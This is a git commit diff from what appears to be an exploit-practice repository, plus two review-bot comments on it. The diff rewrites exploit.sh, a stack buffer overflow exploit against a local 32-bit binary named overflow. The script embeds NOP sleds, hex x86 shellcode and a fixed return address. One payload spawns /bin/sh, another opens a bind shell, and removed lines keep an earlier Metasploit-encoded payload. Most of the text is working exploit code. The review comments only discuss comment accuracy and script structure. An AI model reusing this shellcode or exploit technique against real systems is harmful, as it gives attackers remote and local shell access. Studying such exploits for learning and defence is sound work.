author | toni <toni@devlap.local> | 2015-03-30 19:29:36 +0200 |
---|---|---|
committer | toni <toni@devlap.local> | 2015-04-05 11:55:17 +0200 |
commit | 48ed2c30cac4c144690ddf5e56c6b366636184f0 (patch) | |
tree | e20871adcb3daeb0a8b19cbabd758a90fa4c8033 | |
parent | 5613fcfa7d0c54766e7cc282bebbc3d6782cde5c (diff) |
- added newline to hello_world shellcode
-rwxr-xr-x | exploit.sh | 27 | ||||
-rw-r--r-- | shellcode/hello.asm | 4 |
2 files changed, 23 insertions, 8 deletions
@@ -2,11 +2,26 @@
 # shellcode generated with metasploit (exec /bin/sh):
 # ./msfpayload linux/x86/exec cmd=/bin/sh R | ./msfencode -b '\x00\x09\x0a\x0d\x1b\x20'
+# return addr ./overflow (x86): 0xbffff412
-# 117xNOP (0x90) + shellcode(70) + 117xNOP (0x90) + return addr
+if [ -z "$1" ]; then
+ echo "$0 [local|bind]"
+ exit 1
+fi
-#./overflow `python -c 'print "\x90"*117 + "\xd9\xcd\xd9\x74\x24\xf4\xbf\xc9\x14\x15\x14\x5d\x31\xc9\xb1\x0b\x83\xc5\x04\x31\x7d\x16\x03\x7d\x16\xe2\x3c\x7e\x1e\x4c\x27\x2d\x46\x04\x7a\xb1\x0f\x33\xec\x1a\x63\xd4\xec\x0c\xac\x46\x85\xa2\x3b\x65\x07\xd3\x34\x6a\xa7\x23\x6a\x08\xce\x4d\x5b\xbf\x78\x92\xf4\x6c\xf1\x73\x37\x12" + "\x90"*117 + "\x8c\xd3\xff\xff"'`
-
-# bindshell
-# 85 bytes NOP + 134 bytes shellcode + 85 bytes NOP
-./overflow `python -c 'print "\x90"*85 + "\x31\xc0\x31\xdb\x50\xb3\x01\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x89\xc2\x31\xc0\x50\x66\x68\xaa\x11\x66\x6a\x02\x89\xe1\x6a\x10\x51\x52\x89\xe1\x31\xdb\xb3\x02\xb0\x66\xcd\x80\x31\xc0\x50\x52\x89\xe1\xb0\x66\x31\xdb\xb3\x04\xcd\x80\x31\xc0\x50\x66\x50\x66\x6a\x02\x89\xe1\x6a\x10\x54\x51\x52\x89\xe1\x31\xdb\xb3\x05\xb0\x66\xcd\x80\x31\xc9\xb1\x03\x89\xc3\x31\xc0\xb0\x3f\xfe\xc9\xcd\x80\xfe\xc1\xe2\xf4\x31\xc0\x31\xc9\x99\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x88\x44\x24\x08\xb0\x0b\xcd\x80\xb0\x01\x31\xdb\xb3\x42\xcd\x80" + "\x90"*85 + "\x8c\xd3\xff\xff"'`
+echo "$0: exec exploit .."
+if [ "$1" = "local" ]; then
+ if [ $(getconf LONG_BIT) -eq 32 ]; then
+ # 117xNOP (0x90) + shellcode(70) + 117xNOP (0x90) + return addr
+ # uses own shellcode: shellcode/hello.asm (x86-nasm)
+ ./overflow `python -c 'print "\x90"*158 + "\x31\xc0\x31\xdb\x31\xc9\x99\xeb\x08\x5b\x88\x43\x07\xb0\x0b\xcd\x80\xe8\xf3\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68" + "\x90"*117 + "\x12\xf4\xff\xbf"'`
+ fi
+elif [ "$1" = "bind" ]; then
+ if [ $(getconf LONG_BIT) -eq 32 ]; then
+ # 85 bytes NOP + 134 bytes shellcode + 85 bytes NOP + return addr
+ # uses own shellcode: shellcode/socket.asm (x86-nasm)
+ ./overflow `python -c 'print "\x90"*85 + "\x31\xc0\x31\xdb\x50\xb3\x01\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x89\xc2\x31\xc0\x50\x66\x68\xaa\x11\x66\x6a\x02\x89\xe1\x6a\x10\x51\x52\x89\xe1\x31\xdb\xb3\x02\xb0\x66\xcd\x80\x31\xc0\x50\x52\x89\xe1\xb0\x66\x31\xdb\xb3\x04\xcd\x80\x31\xc0\x50\x66\x50\x66\x6a\x02\x89\xe1\x6a\x10\x54\x51\x52\x89\xe1\x31\xdb\xb3\x05\xb0\x66\xcd\x80\x31\xc9\xb1\x03\x89\xc3\x31\xc0\xb0\x3f\xfe\xc9\xcd\x80\xfe\xc1\xe2\xf4\x31\xc0\x31\xc9\x99\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x88\x44\x24\x08\xb0\x0b\xcd\x80\xb0\x01\x31\xdb\xb3\x42\xcd\x80" + "\x90"*85 + "\x12\xf4\xff\xbf"'`
+ fi
+else
+ $0
+fi
diff --git a/shellcode/hello.asm b/shellcode/hello.asm
index 13eaaff..ef42f2f 100644
--- a/shellcode/hello.asm
+++ b/shellcode/hello.asm
@@ -8,7 +8,7 @@ jmp short string
 code:
 pop ecx
 mov bl,1
-mov dl,12
+mov dl,13
 mov al,4
 int 0x80
 dec bl
@@ -16,4 +16,4 @@ mov al,1
 int 0x80
 string:
 call code
-db 'Hello World!'
+db 'Hello World!', 0x0A
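Review bot: The comment above the `local` branch no longer describes the payload under it: it still reads `117xNOP (0x90) + shellcode(70) + 117xNOP (0x90)` while the line below builds `"\x90"*158` plus a 29-byte string, and it claims the bytes come from `shellcode/hello.asm`, although hello.asm (changed in this same commit) writes 'Hello World!' whereas these bytes embed the string `/bin/sh`. Update the comment to the real layout, `# 158xNOP (0x90) + shellcode(29) + 117xNOP (0x90) + return addr`, and name the source file the bytes were actually assembled from. The `getconf LONG_BIT` guards in both branches fall through silently on anything other than 32, so an `else echo "$0: needs a 32-bit userland" >&2; exit 1` would make the no-op visible instead of reporting success. The closing `else $0` re-executes the script with no arguments just to reach the usage message; printing the usage directly and exiting non-zero is clearer and avoids a second process. The hunk starts at file line 2, so line 1 is outside this view.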
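Review bot: The write length and the string it covers are still maintained by hand in two places, `mov dl,13` in the first hunk and `db 'Hello World!', 0x0A` in the second, so every edit to the string has to be mirrored in the length exactly as this commit does. Let the assembler derive it instead: label the data and compute the constant, `msg: db 'Hello World!', 0x0A` followed by `msg_len equ $ - msg`, and use `mov dl, msg_len` in place of the literal. A short comment on the `mov dl` line, `; length of msg incl. trailing newline`, would also spare readers from counting bytes.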